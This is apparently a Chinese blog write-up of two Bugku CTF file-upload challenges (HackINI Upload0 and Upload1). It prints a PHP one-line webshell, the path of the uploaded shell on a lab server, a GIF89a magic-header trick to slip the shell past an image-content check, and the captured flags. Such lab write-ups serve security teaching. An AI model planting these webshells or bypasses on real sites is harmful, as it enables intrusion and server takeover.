Bugku - 2023 HackINI Upload0 与 2023 HackINI Upload1 详解

码农12138号2025-12-10 13:42

目录

前置知识

解题过程

Upload0

Upload1

总结

前置知识

网络安全-文件上传漏洞-CSDN博客

解题过程

Upload0

打开靶场

根据题目还有页面可可以知道是文件上传漏洞,抓包或者插件可以看到是php环境,

尝试,构造一句话木马1.php文件如下:

复制代码 
<?php
eval($_POST['shell']);
?>

上传成功,点击here可看到路径

复制代码 
http://49.232.142.230:13942/uploads/63b4f3f6cd42bc4d2384208bef372ef4/1.php

直接蚁剑连接即可

连接成功

在根目录下的flag.txt可查看flag

复制代码 
shellmates{s1Mp1E_PHP_Fi1E_up1o4D_tO_W4rMUp}

Upload1

在Upload0的基础上增加了一定的过滤,检测了文件内容是否为图片。

我们增加GIF89a图片魔术头,即可伪装文件为图片,直接构造2.php文件如下:

复制代码 
GIF89a
<?php
eval($_POST['shell']);
?>

其他步骤同Upload0相同,不再赘述

复制代码 
shellmates{PoLyg10t_F1l3s_Byp4$S}

总结

Upload0没有任何过滤的基础php文件上传漏洞

Upload1增加了基础的文件内容检测

相关推荐
小虎哥-技术博客7 小时前
ThinkPHP 5.x 到 8.x 行为扩展迁移指南
php
小虎哥-技术博客11 小时前
ThinkPHP 5 到 ThinkPHP 8 路由迁移完整指南
php
小快说网安12 小时前
从合规到发展:新《网络安全法》如何重塑企业安全建设逻辑
安全·web安全·等保测评
yangSnowy14 小时前
PHP的运行模式
开发语言·php
儒道易行15 小时前
平凡的2025年终总结
网络·安全·web安全
YJlio17 小时前
网络与通信具总览(14.0):从 PsPing 到 TCPView / Whois 的联合作战
开发语言·网络·php
iCheney!17 小时前
php生成赛博像素风头像
开发语言·php
给勒布朗上上对抗呀17 小时前
短标签一句话实战-LitCTF2025-easy_file
ctf
小虎哥-技术博客19 小时前
ThinkPHP 5.0.24 到 ThinkPHP 8.x 迁移学习指南
php
m0_7381207220 小时前
渗透测试——靶机DC-6详细横向过程(Wordpress渗透)
服务器·网络·python·web安全·ssh·php
热门推荐
01GitHub 镜像站点02Linux下V2Ray安装配置指南03jdk21下载、安装(Windows、Linux、macOS)04Claude Code Skills 实用使用手册05UV安装并设置国内源06从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击072025 最新教程:注册并切换到美区 Apple ID08【踩坑笔记】50系显卡适配的 PyTorch 安装09手把手教你通过Gemini3 pro 学生认证,白用一年,手慢无!10祝大家 2026 年新年快乐,代码无 bug,需求一次过